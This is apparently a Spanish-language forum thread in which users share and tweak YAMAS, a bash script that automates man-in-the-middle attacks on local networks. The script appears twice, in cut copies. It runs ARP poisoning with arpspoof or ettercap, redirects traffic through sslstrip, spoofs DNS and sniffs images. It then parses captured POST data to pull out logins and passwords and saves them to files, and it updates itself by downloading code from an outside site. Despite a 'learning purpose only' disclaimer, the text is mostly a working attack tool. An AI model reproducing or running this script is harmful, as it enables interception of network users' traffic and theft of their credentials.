echo "Script is not installed. Do you want to install it ? (Y/N)"
read install
if [[ $install = Y || $install = y ]] ; then
cp -v $0 /usr/bin/yamas
chmod +x /usr/bin/yamas
rm $0
echo "Script should now be installed. Launching it !"
sleep 3
yamas
exit 1
else
echo "Ok, not installing then !"
fi
else
echo "Script is installed"
sleep 1
fi
### End of install process
clear
echo -e "
\`YMM' \`MM' db \`7MMM. ,MMF' db .M\"\"\"bgd
VMA ,V ;MM: MMMb dPMM ;MM: ,MI \"Y
VMA ,V ,V^MM. M YM ,M MM ,V^MM. \`MMb.
VMMP ,M \`MM M Mb M' MM ,M \`MM \`YMMNq.
MM AbmmmqMA M YM.P' MM AbmmmqMA . \`MM
MM A' VML M \`YM' MM A' VML Mb dM
.JMML..AMA. .AMMA..JML. \`' .JMML..AMA. .AMMA.P\"Ybmmd\" " # <= I love it.
echo -e "===========================================================================
=\033[31m Welcome to Yet Another MITM Automation Script.\033[m =
=\033[31m Use this tool responsibly, and enjoy!\033[m =
= Feel free to contribute and distribute this script as you please. =
= Official thread : http://tinyurl.com/yamas-bt5 =
= Check out the help (-h) to see new features and informations =
= You are running version \033[32m$version\033[m =
==========================================================================="
echo -e "\033[36mMessage of the day :\033[m"
echo -e "$message"
echo
# Starting fresh : reset IP forward and iptables
echo -e "\033[31m - Cleaning iptables \033[m"
echo "0" > /proc/sys/net/ipv4/ip_forward
iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain
echo "[-] Cleaned."
# Defining exit function and other ending features
cleanup()
{
echo
echo -e "\033[31m- Killing processes and resetting iptable.\033[m"
kill $sslstripid
kill $looparseid
if [[ $drifton = 1 ]]; #if driftnet was used
then
echo -e "\033[31mIMMA KILL THIS DRIFTNET BITCH\033[m" #It's between him and me.
if [[ ! -e $log_output_dir ]]; #check if destination folder exists, since driftnet won't create one nor save images
then
mkdir $log_output_dir #create if needed
fi
killall driftnet #kill the unbeliever
elif [[ $drifton = 2 ]]; #if tcpxtract was used
then
killall tcpxtract #kill it...
fi
if [[ "$etter" = "1" ]];then
killall ettercap
else
killall arpspoof
fi
echo "0" > /proc/sys/net/ipv4/ip_forward #stop ipforwarding
iptables --flush # there are probably too many resets here,
iptables --table nat --flush # but at least we're sure everything's clean
iptables --delete-chain
iptables --table nat --delete-chain
rm /tmp/looparse.sh
echo -e "\033[32m[-] Clean up successful !\033[m"
echo -e "\nDo you want to keep the whole log file for further use or shall we delete it? (Y=keep)"
echo "(If you want to keep it, it will be stored in $log_output_dir/$filename.txt)"
read -e keep
if [[ $keep = "Y" || $keep = "y" ]];then # double brackets because double condition. || signifies "or"
cp /tmp/$filename.txt $log_output_dir/$filename.txt #moving file
if [ -f "$log_output_dir/$filename.txt" ]; then #check if it exists
echo "Log file copied !" #it does
else echo "Error while copying log file. Go check /tmp/ for $filename.txt" #it does not
fi
else
echo "Logs not saved"
fi
echo -e "\nDo you want to save passwords to a file? (Y=keep)"
echo "(If you want to keep it, it will be saved in $log_output_dir/$filename.pass.txt)"
read -e keeppd
if [[ $keeppd = "Y" || $keeppd = "y" ]];then # double brackets because double condition. || signifies "or"
cat /tmp/$filename.txt |
awk -F "(" '/POST Data/ {for (i=1;i<=NF;i++) if (match($i,/POST Data/)) n=i; print "Website = \t"$2; getline; print $n"\n"}' |
awk -F "&" '{for(i=1;i<=NF;i++) print $i }' |
egrep -i -a -f /tmp/grepcred.txt |
awk -F "=" '{if (length($2) < 4) print "";
else if ($1 ~/Website/) print $0;
else if ($1 ~/[Pp]/) print "Password = \t"$2"\n";
else print "Login = \t"$2}' |
uniq >> $log_output_dir/$filename.pass.txt # >> appends to a potential previous file.
if [ -f "$log_output_dir/$filename.pass.txt" ]; then #check if it exists
echo "Passwords saved !" #it does
else
echo "Error while saving passwords" #it does not
fi
else
echo "Password saving skipped."
fi
rm /tmp/$filename.txt
echo -e "\nTemporary files deleted."
if [[ -f "/usr/bin/yamas" && $ask_for_install != 'y' ]];then #check if script is already installed
echo -e "\n\n"
exit 1 #if yes, exit.
else
echo "This script is not installed yet. Do you wish to install it, so that you can reuse it later on by simply issuing 'yamas' in console? (Y/N)"
read -e install
case $install in
Y | y | yes)
cp $0 /usr/bin/yamas #copy and rename script
echo -e "\033[32m Script installed !\033[m" ;;
*) echo "Script not installed." ;;
esac
fi
exit 1
}
search=$(ip route show | awk '(NR == 2) { print $1}') #store gateway/24 for whole network mapping to variable
#We put it here in the middle, because it could be used two times, but the gateway shouldn't change,
#so there is no need to do it twice.
rescan ()
{
echo -e "\033[31m"
nmap -sn $search | grep report | awk -F for '{ print $2 }' #host discorvey
echo -en "\033[m"
final
}
add_target()
{
echo "Enter a new IP adress to attack :"
read newip
xterm -geometry 90x3-1-1 -T "Poisoning $newip" -e arpspoof -i $iface -t $newip $gateway 2>/dev/null & sleep 2
final
}
ascii()
{
clear
cat /tmp/ascii
rm /tmp/ascii
final
}
dns_spoof()
{
### Make Host function###
mkhst()
{
echo "Enter your redirection list line by line. End with #.
Usage is : 127.0.0.1 foo.bar.com
Wildcards may be used."
rm ~/hosts_spoof
while :
do
read input
echo "$input" >> ~/hosts_spoof
if [[ $input == "#" ]];then
break
fi
done
}
###EOfunc###
echo "If you already have a host file, enter its path. If you don't, press enter."
read gothost
if [[ $gothost != "" ]];then
echo "Host file $gothost will be used."
else
echo -e "We'll make one...\n"
mkhst
fi
xterm -geometry 90x3-1-1 -T "DNS spoofing" -e dnsspoof -i $iface -f ~/hosts_spoof & dnsid=$!
}
choose_dns()
{
echo "Would you like to use Ettercap 'dns_spoof' plugin or dnsspoof (E/D) ? Press a to abort"
read spoofpgm
case $spoofpgm in
E) echo "We'll use ettercap. Make sure to have edited /usr/share/ettercap/etter.dns"
ettercap -D -q -i $iface -T -P dns_spoof & etterspoofid=$! ;;
D) echo "We'll use dnsspoof."
dns_spoof ;;
a | A) final ;;
*) echo "Wrong choice. Please use E or D"
choose_dns;;
esac
final
}
misc()
{
echo -e "\nHere are the miscellanous features.
1. Image sniffing
2. DNS spoofing
3. Previous menu."
read misc
case $misc in
1) image_menu
final ;;
2) choose_dns ;;
3) final ;;
*) echo "bad choice"
misc ;;
esac
}
image_menu()
{
image_choice=1
case $image_choice in
1) driftnet -i $iface -d $log_output_dir &> /dev/null &
drifton=1
echo "Driftnet launched."
misc ;;
esac
}
rtparse()
{
echo -e "\n\nIn this menu, you can pause, resume, kill, or launch
realtime parsing (RTP).
1. Pause RTP (keep xterm open for you to read, copypasta, etc.)
2. Resume RTP.
3. Kill RTP (stop and close xterm)
4. Re-launch RTP
5. Previous menu."
read rtp
case $rtp in # not sure if this should be quote enclosed...anyone want to help out? It's singular options without a space, so I think the need for quotes is NOT needed??
1) echo -e "\033[33m
kill -19 $looparseid
echo -e "\033[33m[-]Paused.\033[m"
rtparse;;
2) echo -e "\033[33m
kill -18 $looparseid
echo -e "\033[33m[-]Resumed.\033[m"
rtparse;;
3) echo -e "\033[31m
kill $looparseid
echo -e "\033[33m[-]Killed.\033[m"
rtparse;;
4) echo -e "\033[32m
xterm -hold -geometry 90x20-1-100 -T Passwords -e /tmp/looparse.sh & looparseid=$!
sleep 2
echo -e "\033[33m[-]Launched.\033[m"
rtparse;;
5) echo "Previous"
final ;;
*) echo -e "\033[31mBad choice bro !\033[m\n" #Professional Language =)
rtparse;;
esac
}
final()
{
echo -e "\n\033[32mAttack is running\033[m. You can :
1. Rescan network.
2. Add a target (useless if targeting whole network).
3. Display ASCII correspondence table.
4. Real-time parsing...
5. Misc features.
6. Quit properly.
Enter the number of the desired option."
read final
case $final in
1) rescan ;;
2) add_target ;;
3) ascii ;;
4) rtparse ;;
5) misc ;;
6) cleanup ;;
*) echo -e "\033[31mBad choice bro !\033[m\n" #was "motherfucker" during my tests.
final ;;
esac
}
###############################End of functions#############################
# IP forwarding
echo
echo -e "\033[31m - Activating IP forwarding... \033[m"
echo "1" > /proc/sys/net/ipv4/ip_forward
echo "[-] Activated."
#Iptables
echo
echo -e "\033[31m - Configuring iptables... \033[m"
echo -en "\033[31m To \033[mwhat port should the traffic be redirected to? (default = 8080)"
echo
read -e outport
if [ "$outport" = "" ];then
outport=8080
echo -e "Port $outport selected as default.\n"
fi
echo -en "\033[31m From \033[mwhat port should the traffic be redirected to? (default = 80)"
echo
read -e inport
if [ "$inport" = "" ];then
inport=80
echo -e "Port $inport selected as default.\n"
fi
echo -e "\n\033[33m Traffic from port $inport will be redirected to port $outport \033[m"
iptables -t nat -A PREROUTING -p tcp --destination-port $inport -j REDIRECT --to-port $outport
echo "[-] Traffic rerouted"
#Sslstrip
echo
echo -e "\033[31m - Activating sslstrip... \033[m"
echo "Choose filename to output : (default = yamas)"
read -e filename
if [ "$filename" = "" ];then
filename="yamas"
fi
echo -e "\033[33m Sslstrip will be listening on port $outport and outputting log in /tmp/$filename.txt\033[m"
if [ ! -e '/usr/bin/sslstrip' ];then # If sslstrip isn't installed
if [ ! -x '$sslstrip_dir/sslstrip.py' ];then #if non-installed is not executable
chmod +x $sslstrip_dir/sslstrip.py #make it executable
fi
$sslstrip_dir/sslstrip.py $fav -a -k -l $outport -w /tmp/$filename.txt 2> /dev/null & sslstripid=$! #launch non-installed
else
sslstrip $fav -a -k -l $outport -w /tmp/$filename.txt 2> /dev/null & sslstripid=$!
fi
sleep 4 #let time for sslstrip to launch. Might be bit too much, but better prevent than heal.
echo
echo -e " [-] Sslstrip is running." # a bit redundant, but who cares?
echo
#Arpspoofing
echo
echo -e "\033[31m - Activating ARP cache poisoning... \033[m"
echo
ip route show | awk '(NR == 1) { print "Gateway :", $3," ", "Interface :", $5}' #Output IP route show user-friendly
iface=$(ip route show | awk '(NR == 1) { print $5}')
gateway=$(ip route show | awk '(NR == 1) { print $3}') #store gateway ip
echo
echo "Enter IP gateway adress or press enter to use $gateway."
read -e gateway
if [ "$gateway" = "" ];then
gateway=$(ip route show | awk '(NR == 1) { print $3}') #restore gateway ip since pressing enter set our var to null
echo -e "$gateway selected as default.\n"
fi
echo
echo "What interface would you like to use? It should match IP gateway as shown above. Press enter to use $iface."
read -e iface
if [ "$iface" = "" ];then
iface=$(ip route show | awk '(NR == 1) { print $5}') #store default interface
echo -e "$iface selected as default.\n"
fi
echo -e "\r"
echo -e "We will target the whole network as default. You can \033[4md\033[miscover hosts and enter IP(s) manually by entering \033[4mD\033[m.
Press enter to default."
read -e choicearp
echo
if [[ $choicearp = "D" || $choicearp = "d" ]];then
echo -e "\nDo you want to map the network to show live hosts? (Y/N) [This might take up to 30 secs, be patient]"
read -e hosts
echo -e "\033[31m "
if [[ $hosts = "Y" || $hosts = "y" ]];then
nmap -sn $search | grep report | awk -F for '{ print $2 }' #host discovery
echo -e "\033[m " # switch color back to white
else
echo -e "\033[m "
fi
echo -e "Please enter targets according to usage : IP1 IP2 IP3...
\033[31m Beware ! This will spawn as many windows as input targets and might slow down performances. If that was the case, then use whole network targeting.\033[m "
arpspoofi()
{ # We launch ARPspoof in different xterm windows to keep script running
while [ "$1" != "" ];do
xterm -geometry 90x3-1-1 -T "Poisoning $1" -e arpspoof -i $iface -t $1 $gateway 2>/dev/null & sleep 2
shift
done
echo -e "\033[33m Targeting $parameters on $gateway on $iface with ARPspoof\033[m"
}
ettercapi()
{ # We launch ARPspoof in different xterm windows to keep script running
while [ "$1" != "" ];do
xterm -geometry 90x3-1-1 -T "Poisoning $1" -e ettercap -o -q -i $iface -T -M arp /$gateway/ /$1/ 2>/dev/null & sleep 2
shift
done
echo -e "\033[33m Targeting $parameters on $gateway on $iface with Ettercap\033[m"
}
read -e parameters
if [[ "$etter" = "1" ]];then
ettercapi $parameters
else
arpspoofi $parameters
fi
else
if [[ "$etter" = "1" ]];then
xterm -geometry 90x3-1-1 -T ettercap -e ettercap -o -q -i $iface -T -M arp // // &
sleep 2
echo -e "\033[33m Targeting the whole network on $gateway on $iface with Ettercap\033[m"
else
xterm -geometry 90x3-1-1 -T arpspoof -e arpspoof -i $iface $gateway &
sleep 2
echo -e "\033[33m Targeting the whole network on $gateway on $iface with ARPspoof\033[m"
fi
fi
echo -e "[-] Arp cache poisoning is launched. \033[31m Keep new window(s) running. \033[m"
echo -e "\n\033[32m Attack should be running smooth, enjoy.\033[m"
echo
echo
echo "looparse(){
while :
do
clear
echo -e 'Note that %40 %21, etc. are ASCII chars. + means a space...\n'
cat /tmp/$filename.txt |
awk -F \"(\" '/POST Data/ {for (i=1;i<=NF;i++) if (match(\$i,/POST Data/)) n=i; print \"Website = \t\"\$2; getline; print \$n\"\n\"}' |
awk -F \"&\" '{for(i=1;i<=NF;i++) print \$i }' | #print each field on a new line
egrep -i -f '/tmp/grepcred.txt' |
awk -F \"=\" '{if (length(\$2) < 3) print \"\";
else if (\$1 ~/[W]/) print \$0;
else if (\$1 ~/[Pp]/) print \"Password = \t\" \$2\"\n\";
else print \"Login = \t\t\", \$2}' |
uniq
sleep 7
done
}
looparse" > /tmp/looparse.sh #We create a parsing script on-the-fly, chmod it, run it, kill it and remove it at the end.
chmod +x /tmp/looparse.sh
xterm -hold -geometry 90x20-1-100 -T Passwords -e /tmp/looparse.sh & looparseid=$! #here's the beauty
sleep 2
final #call the "final" function. Yes, it's the final one.
### End of the script fellas.[/spoiler]
-
mm, yo comiendome la cabeza, y ademas resulta que driftnet cuando acaba limpia el directorio /tmp , o el script lleva la orden en algun sitio >:(
asi que ya esta.
-
bueno , me quedare con el tuyo , pero con tu permiso le modificare 1 linea.
cuando creamos la ruta de captura..nos crea la carpeta con la fecha...con lo que al final en root tendremos un monton de carpetas.
asi que le añadi
/driftnet
y dentro crea las carpetas con fecha y sus capturas..asi estaran ordenadas dentro de su capeta y no danzando por la raiz.
linea 453
donde antes
1) mkdir $log_output_dir/capture_$(date +%d%m%y).....
despues
1) mkdir $log_output_dir/Driftnet/capture_$(date +%d%m%y)....
me quedo con el tuyo que esta un poco mas aseado , ya que solo crea carpetas de captura cuando se lanza driftnet y no antes, el mio creaba las rutas sistematicamente aunque no ejecutaramos driftnet.
buen trabajo tio,. >:( >:( >:( >:( >:(
-
bueno , me quedare con el tuyo , pero con tu permiso le modificare 1 linea.
cuando creamos la ruta de captura..nos crea la carpeta con la fecha...con lo que al final en root tendremos un monton de carpetas.
asi que le añadi
/driftnet
y dentro crea las carpetas con fecha y sus capturas..asi estaran ordenadas dentro de su capeta y no danzando por la raiz.
linea 453
donde antes
1) mkdir $log_output_dir/capture_$(date +%d%m%y).....
despues
1) mkdir $log_output_dir/Driftnet/capture_$(date +%d%m%y)....
me quedo con el tuyo que esta un poco mas aseado , ya que solo crea carpetas de captura cuando se lanza driftnet y no antes, el mio creaba las rutas sistematicamente aunque no ejecutaramos driftnet.
buen trabajo tio,. >:( >:( >:( >:( >:(
Perfect ;)
Al final hemos mejorado bastante el script original, somos unos maquinas ;D
esto es trabajo en equipo y lo demas son tonterias >:( >:( >:( >:( >:(
-
al final me toco en el parametro de captura, espeficicar
/root/Driftnet
asi al hacer mkdir , se genera , y dentro la carpeta con fecha.
pd: al mkdir le añadi la opcion -p para que aunque exista el directorio , lo genere igualmente por que si no , no se captura,...y aunque regenere un directorio existente, el contenido no se pierde.
he hecho varias pruebas..en varias sesiones y esta todo perfect.
parecemos chimo bayo..esta si esta no.... >:D >:D >:D >:D >:D
code final.
[spoiler]
# #!/bin/bash
# Bash script to launch man it the middle attack and sslstrip.
# version 0.9 by comaX
# Modified by www.seguridadwireless.net
if [ $UID -ne 0 ]; then
echo -e "\033[31This program must be run as root.
This will probably fail.\033[m"
sleep 3
fi
log_output_dir=/root/Driftnet
sslstrip_dir=
ask_for_install=n
if [ ! -d "$log_output_dir" ]; then
mkdir -p $log_output_dir
fi
version="20120213"
# if user ^C then execute cleanup function
trap fast_cleanup SIGINT # will prolly output errors, but that's normal since it may try killing non-existing processes.
fast_cleanup()
{
echo -e "\n\n\033[31m ^C catched. Cleaning up, then exit.\033[m"
if [[ $looparseid != "" ]];then
kill $looparseid
fi
if [[ $sslstripid != "" ]];then
kill $sslstripid
fi
if [[ $dnsid != "" ]];then
kill $dnsid
fi
if [[ $etterspoofid != "" ]];then
kill $etterspoofid
fi
if [[ "$etter" = "1" ]];then
killall ettercap
else
killall arpspoof
fi
echo "0" > /proc/sys/net/ipv4/ip_forward #stop ipforwarding
iptables --flush # there are probably too many resets here,
iptables --table nat --flush # but at least we're sure everything's clean
iptables --delete-chain
iptables --table nat --delete-chain
if [ -e '/tmp/looparse.sh' ]; then
rm /tmp/looparse.sh
fi
echo -e "\033[32m[-] Clean up successful !\033[m"
exit 0
}
#Let's define some arguments that can be passed to the script :
#generating grepcred.txt so that it doesn't have to be downloaded each time
#it was originally being downloaded so I could easily fix it, but there has
#been no fix to be done... So why use a file instead of a command line ?
#It's just much more easier this way.
echo -e "credential\nemail\nlast\nlog\nmodified\nname\nnickname\npass\npersistent\npw\nsession\ntextbox\nuser\nwebsite" > /tmp/grepcred.txt
while [ "$1" != "" ];do
case $1 in
-p | --parse)
if [[ $2 == "" ]]; then
echo -e "No input file given. Quitting. \nusage : $0 -p <file>"
exit 0
fi
clear
echo -e "Parsing $2 for credentials.\n\n"
cat $2 |
awk -F "(" '/POST Data/ {for (i=1;i<=NF;i++) if (match($i,/POST Data/)) n=i; print "Website = \t"$2; getline; print $n"\n"}' |
awk -F "&" '{for(i=1;i<=NF;i++) print $i }' |
egrep -i -a -f /tmp/grepcred.txt |
awk -F "=" '{if (length($2) < 4) print "";
else if ($1 ~/Website/) print $0;
else if ($1 ~/[Pp]/) print "Password = \t"$2"\n";
else print "Login = \t"$2}' |
uniq
exit 0 ;;
-e | --etter) echo -e "\tYou will be using Ettercap instead of ARPspoof."
etter="1"
shift
sleep 0.5 ;;
-h | --help) clear
echo -e "You are running $0, version $version.
usage : $0 -h -c -p -e -s -f
-h or --help : Display this help message, disclaimer and exit.
-c or --change: Display changelog and todo.
-e : Use ettercap instead of ARPspoof. One might have one's reasons...
ARPspoof is default.
-p or --parse : Only parse the given <file>. Don't use wildcards.
Use > /output_file to print to a file.
-s : The script won't download anything. Make sure you have the needed files.
-f : Use a padlock favicon in sslstrip.
\033[31m DISCLAIMER :\033[m
This program is intended for learning purpose only. I do not condone hacking
and wouldn't be held responsible for your actions. Only you would face legal
consequences if you used this script for illegal activities.
\033[31m What I think should be learnt from this script :\033[m
This script should teach you how easy it is to steal sensitive online
credentials and how to protect you from it, provided you understand
what this program does. The best way to understand what it does is
to look at its source. This will also teach you basic shell scripting."
exit 0 ;;
-c | --change)
clear
echo -e "\033[31m Changelog :\033[m
ToDo :
- FakeSSL -> Need help
\033[31mFeatures :\033[m
- Output of credentials as they are sniffed in xterm window.
- Log parsing for user-friendly output.
- Both arpspoof and ettercap are suported
- Network mapping for host discovery.
- Can save \"dumped\" passwords to file.
- Support for multiple targets on the network.
- Can parse a single file.
- Display ASCII tables for better readability of creds.
- All options know default, pressing only enter should get you through.
- Very neat and kewl ascii =D
- Miscellaneous features
\033[31m Credits :\033[m
Credits go to all people on backtrack forums for their help and support,
and google for being my best friend with scripting.
Special kudos to ShortBuss for something I should have seen a
long time ago (sslstrip before arpspoof) and many little improvements.
And of course, to the people responsible for the tools I am using in this script.
Please criticize this program or submit ideas on the official thread at
http://tinyurl.com/yamas-bt5 or send me a mail at contact.comax@gmail.com"
exit ;;
-s | --silent)
echo "silent mode ON"
silent="1"
shift ;;
-f | --fav)
echo "favicon mode ON"
fav="-f"
shift ;;
*) shift ;;
esac
done
### Message of the day ! <= Fucking useless, but who knows, I might want to warn about something directly, or tell a joke...
if [[ "$silent" = "1" ]]; then
message="\nNo message to display : you are running in silent mode"
else
message=$(curl --silent -q http://comax.fr/yamas/bt5/message) #store it to variable
fi
if [[ $1 = "-s" || $2 = "-s" ]]; then
echo "ASCII tables won't be available."
echo "ASCII tables are not available due to the use of silent mode." > /tmp/ascii
else
wget -q http://comax.fr/yamas/bt5/ascii -O /tmp/ascii
fi
### Check for updates !
if [[ "$silent" = "1" ]];then
echo "Not checking for a new version : silent mode."
else
changelog=$(curl --silent -q http://comax.fr/yamas/bt5/changelog)
last_version=$(curl --silent -q http://comax.fr/yamas/bt5/version) #store last version number to variable
if [[ $last_version > $version ]];then # Comparing to current version
echo -e "You are running version \033[31m$version\033[m, do you want to update to \033[32m$last_version\033[m? (Y/N)
Last changes are :
$changelog"
read update
if [[ $update = Y || $update = y ]];then
echo "
Updating script..."
wget -q http://comax.fr/yamas/bt5/yamas.sh -O $0
chmod +x $0
echo "[-] Script updated !"
if [[ $0 != '/usr/bin/yamas' && $ask_for_install = 'y' ]];then
echo -e "Do you want to install it so that you can launch it with \"yamas\" ?"
read install
if [[ $install = Y || $install = y ]];then #do not proceed to install if using installed version : updating it already "installed" it over.
cp $0 /usr/bin/yamas
chmod +x /usr/bin/yamas
echo "Script should now be installed, launching yamas !"
sleep 3
yamas
exit 1
else
echo "Ok, continuing with updated version..."
sleep 3
$0
exit 1
fi
fi
sleep 2
$0
exit 1
else
echo "Ok, continuing with current version..."
fi
else
echo "No update available"
fi
fi
### End of update process
### Install process
if [[ ! -e '/usr/bin/yamas' && $ask_for_install = 'y' ]];then
echo "Script is not installed. Do you want to install it ? (Y/N)"
read install
if [[ $install = Y || $install = y ]] ; then
cp -v $0 /usr/bin/yamas
chmod +x /usr/bin/yamas
rm $0
echo "Script should now be installed. Launching it !"
sleep 3
yamas
exit 1
else
echo "Ok, not installing then !"
fi
else
echo "Script is installed"
sleep 1
fi
### End of install process
clear
echo -e "
\`YMM' \`MM' db \`7MMM. ,MMF' db .M\"\"\"bgd
VMA ,V ;MM: MMMb dPMM ;MM: ,MI \"Y
VMA ,V ,V^MM. M YM ,M MM ,V^MM. \`MMb.
VMMP ,M \`MM M Mb M' MM ,M \`MM \`YMMNq.
MM AbmmmqMA M YM.P' MM AbmmmqMA . \`MM
MM A' VML M \`YM' MM A' VML Mb dM
.JMML..AMA. .AMMA..JML. \`' .JMML..AMA. .AMMA.P\"Ybmmd\" " # <= I love it.
echo -e "===========================================================================
=\033[31m Welcome to Yet Another MITM Automation Script.\033[m =
=\033[31m Use this tool responsibly, and enjoy!\033[m =
= Feel free to contribute and distribute this script as you please. =
= Official thread : http://tinyurl.com/yamas-bt5 =
= Check out the help (-h) to see new features and informations =
= You are running version \033[32m$version\033[m =
==========================================================================="
echo -e "\033[36mMessage of the day :\033[m"
echo -e "$message"
echo
# Starting fresh : reset IP forward and iptables
echo -e "\033[31mCleaning iptables \033[m"
echo "0" > /proc/sys/net/ipv4/ip_forward
iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain
echo "[-] Cleaned."
# Defining exit function and other ending features
cleanup()
{
echo
echo -e "\033[31mKilling processes and resetting iptable.\033[m"
kill $sslstripid
kill $looparseid
if [[ $drifton = 1 ]]; #if driftnet was used
then
killall driftnet && killall driftnet #kill the unbeliever
fi
if [[ "$etter" = "1" ]];then
killall ettercap
else
killall arpspoof
fi
echo "0" > /proc/sys/net/ipv4/ip_forward #stop ipforwarding
iptables --flush # there are probably too many resets here,
iptables --table nat --flush # but at least we're sure everything's clean
iptables --delete-chain
iptables --table nat --delete-chain
rm /tmp/looparse.sh
echo -e "\033[32m[-] Clean up successful !\033[m"
echo -e "\nDo you want to keep the whole log file for further use or shall we delete it? (Y=keep)"
echo "(If you want to keep it, it will be stored in $log_output_dir/$filename.txt)"
read -e keep
if [[ $keep = "Y" || $keep = "y" ]];then # double brackets because double condition. || signifies "or"
cp /tmp/$filename.txt $log_output_dir/$filename.txt #moving file
if [ -f "$log_output_dir/$filename.txt" ]; then #check if it exists
echo "Log file copied !" #it does
else echo "Error while copying log file. Go check /tmp/ for $filename.txt" #it does not
fi
else
echo "Logs not saved"
fi
echo -e "\nDo you want to save passwords to a file? (Y=keep)"
echo "(If you want to keep it, it will be saved in $log_output_dir/$filename.pass.txt)"
read -e keeppd
if [[ $keeppd = "Y" || $keeppd = "y" ]];then # double brackets because double condition. || signifies "or"
cat /tmp/$filename.txt |
awk -F "(" '/POST Data/ {for (i=1;i<=NF;i++) if (match($i,/POST Data/)) n=i; print "Website = \t"$2; getline; print $n"\n"}' |
awk -F "&" '{for(i=1;i<=NF;i++) print $i }' |
egrep -i -a -f /tmp/grepcred.txt |
awk -F "=" '{if (length($2) < 4) print "";
else if ($1 ~/Website/) print $0;
else if ($1 ~/[Pp]/) print "Password = \t"$2"\n";
else print "Login = \t"$2}' |
uniq >> $log_output_dir/$filename.pass.txt # >> appends to a potential previous file.
if [ -f "$log_output_dir/$filename.pass.txt" ]; then #check if it exists
echo "Passwords saved !" #it does
else
echo "Error while saving passwords" #it does not
fi
else
echo "Password saving skipped."
fi
rm /tmp/$filename.txt
echo -e "\nTemporary files deleted."
if [[ -f "/usr/bin/yamas" && $ask_for_install != 'y' ]];then #check if script is already installed
echo -e "\n\n"
exit 1 #if yes, exit.
else
echo "This script is not installed yet. Do you wish to install it, so that you can reuse it later on by simply issuing 'yamas' in console? (Y/N)"
read -e install
case $install in
Y | y | yes)
cp $0 /usr/bin/yamas #copy and rename script
echo -e "\033[32m Script installed !\033[m" ;;
*) echo "Script not installed." ;;
esac
fi
exit 1
}
search=$(ip route show | awk '(NR == 2) { print $1}') #store gateway/24 for whole network mapping to variable
#We put it here in the middle, because it could be used two times, but the gateway shouldn't change,
#so there is no need to do it twice.
rescan ()
{
echo -e "\033[31m"
nmap -sn $search | grep report | awk -F for '{ print $2 }' #host discorvey
echo -en "\033[m"
final
}
add_target()
{
echo "Enter a new IP adress to attack :"
read newip
xterm -geometry 90x3-1-1 -T "Poisoning $newip" -e arpspoof -i $iface -t $newip $gateway 2>/dev/null & sleep 2
final
}
ascii()
{
clear
cat /tmp/ascii
rm /tmp/ascii
final
}
dns_spoof()
{
### Make Host function###
mkhst()
{
echo "Enter your redirection list line by line. End with #.
Usage is : 127.0.0.1 foo.bar.com
Wildcards may be used."
rm ~/hosts_spoof
while :
do
read input
echo "$input" >> ~/hosts_spoof
if [[ $input == "#" ]];then
break
fi
done
}
###EOfunc###
echo "If you already have a host file, enter its path. If you don't, press enter."
read gothost
if [[ $gothost != "" ]];then
echo "Host file $gothost will be used."
else
echo -e "We'll make one...\n"
mkhst
fi
xterm -geometry 90x3-1-1 -T "DNS spoofing" -e dnsspoof -i $iface -f ~/hosts_spoof & dnsid=$!
}
choose_dns()
{
echo "Would you like to use Ettercap 'dns_spoof' plugin or dnsspoof (E/D) ? Press a to abort"
read spoofpgm
case $spoofpgm in
E) echo "We'll use ettercap. Make sure to have edited /usr/share/ettercap/etter.dns"
ettercap -D -q -i $iface -T -P dns_spoof & etterspoofid=$! ;;
D) echo "We'll use dnsspoof."
dns_spoof ;;
a | A) final ;;
*) echo "Wrong choice. Please use E or D"
choose_dns;;
esac
final
}
misc()
{
echo -e "\nHere are the miscellanous features.
1. Image sniffing
2. DNS spoofing
3. Previous menu."
read misc
case $misc in
1) mkdir -p $log_output_dir/capture_$(date +%d%m%y) && driftnet -i $iface -a -d $log_output_dir/capture_$(date +%d%m%y) > /dev/null & driftnet -i $iface &> /dev/null &
drifton=1 &
echo "Driftnet launched, the images will be saved in $log_output_dir/capture_$(date +%d%m%y)"
misc ;;
2) choose_dns ;;
3) final ;;
*) echo "bad choice"
misc ;;
esac
}
rtparse()
{
echo -e "\n\nIn this menu, you can pause, resume, kill, or launch
realtime parsing (RTP).
1. Pause RTP (keep xterm open for you to read, copypasta, etc.)
2. Resume RTP.
3. Kill RTP (stop and close xterm)
4. Re-launch RTP
5. Previous menu."
read rtp
case $rtp in # not sure if this should be quote enclosed...anyone want to help out? It's singular options without a space, so I think the need for quotes is NOT needed??
1) echo -e "\033[33mPausing...\033[m"
kill -19 $looparseid
echo -e "\033[33m[-]Paused.\033[m"
rtparse;;
2) echo -e "\033[33mResuming...\033[m"
kill -18 $looparseid
echo -e "\033[33m[-]Resumed.\033[m"
rtparse;;
3) echo -e "\033[31mKilling...\033[m"
kill $looparseid
echo -e "\033[33m[-]Killed.\033[m"
rtparse;;
4) echo -e "\033[32mLaunching...\033[m"
xterm -hold -geometry 90x20-1-100 -T Passwords -e /tmp/looparse.sh & looparseid=$!
sleep 2
echo -e "\033[33m[-]Launched.\033[m"
rtparse;;
5) echo "Previous"
final ;;
*) echo -e "\033[31mBad choice bro !\033[m\n" #Professional Language =)
rtparse;;
esac
}
final()
{
echo -e "\n\033[32mAttack is running\033[m. You can :
1. Rescan network.
2. Add a target (useless if targeting whole network).
3. Display ASCII correspondence table.
4. Real-time parsing...
5. Misc features.
6. Quit properly.
Enter the number of the desired option."
read final
case $final in
1) rescan ;;
2) add_target ;;
3) ascii ;;
4) rtparse ;;
5) misc ;;
6) cleanup ;;
*) echo -e "\033[31mBad choice bro !\033[m\n" #was "motherfucker" during my tests.
final ;;
esac
}
###############################End of functions#############################
# IP forwarding
echo
echo -e "\033[31mActivating IP forwarding... \033[m"
echo "1" > /proc/sys/net/ipv4/ip_forward
echo "[-] Activated."
#Iptables
echo
echo -e "\033[31mConfiguring iptables... \033[m"
echo -en "\033[31m To \033[mwhat port should the traffic be redirected to? (default = 8080)"
echo
read -e outport
if [ "$outport" = "" ];then
outport=8080
echo -e "Port $outport selected as default.\n"
fi
echo -en "\033[31m From \033[mwhat port should the traffic be redirected to? (default = 80)"
echo
read -e inport
if [ "$inport" = "" ];then
inport=80
echo -e "Port $inport selected as default.\n"
fi
echo -e "\n\033[33m Traffic from port $inport will be redirected to port $outport \033[m"
iptables -t nat -A PREROUTING -p tcp --destination-port $inport -j REDIRECT --to-port $outport
echo "[-] Traffic rerouted"
#Sslstrip
echo
echo -e "\033[31mActivating sslstrip... \033[m"
echo "Choose filename to output : (default = yamas)"
read -e filename
if [ "$filename" = "" ];then
